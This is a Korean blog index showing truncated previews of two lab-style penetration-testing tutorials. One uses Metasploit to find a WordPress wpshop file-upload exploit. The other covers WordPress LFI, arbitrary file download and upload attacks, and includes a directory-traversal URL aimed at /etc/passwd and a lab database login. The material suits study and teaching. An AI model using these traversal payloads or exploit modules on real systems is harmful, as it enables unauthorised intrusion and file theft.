전체 글
Metasploit을 이용한 Kali Linux에서 원격으로 서버 콘솔에 접속
1) Metasploit 콘솔 접속 1 root@kali:~/ msfconsole cs 2) 공격 옵션 설정 1 msfconsole > search wpshop cs wpshop과 관련된 활용 정보를 msfconsole 데이터베이스에서 찾을 수 있다. 1 2 3 4 5 6 7 8 9 msf > search wpshop [!] Module database cache not built yet, using slow search Matching Modules ================ Name Disclosure Date Rank Description ---- --------------- ---- ----------- exploit/unix/webapp/wp_wpshop_ecommerce_file_uploa..
WordPress 취약점 공격 - LFI, AFD, AFU
원문 : https://condencia.postype.com/post/2402942원문 등록 일시 : 2018.09.04 실습환경 : Kali Linux· wpscan : WordPress 취약점을 진단해주는 툴 1root@kali:/ wpscan -u [IP address]:7070/wordpress cs 19192.168.86.129:7070/phpmyadmin 접속계정명 : root, 비밀번호 : server · LFI(Local File Inclusion) : 로컬 서버에 있는 파일을 실행에 포함시킴https://www.exploit-db.com/exploits/40850 1http://[server IP address]:7070/wordpress?wpv-image=../../../etc/pas..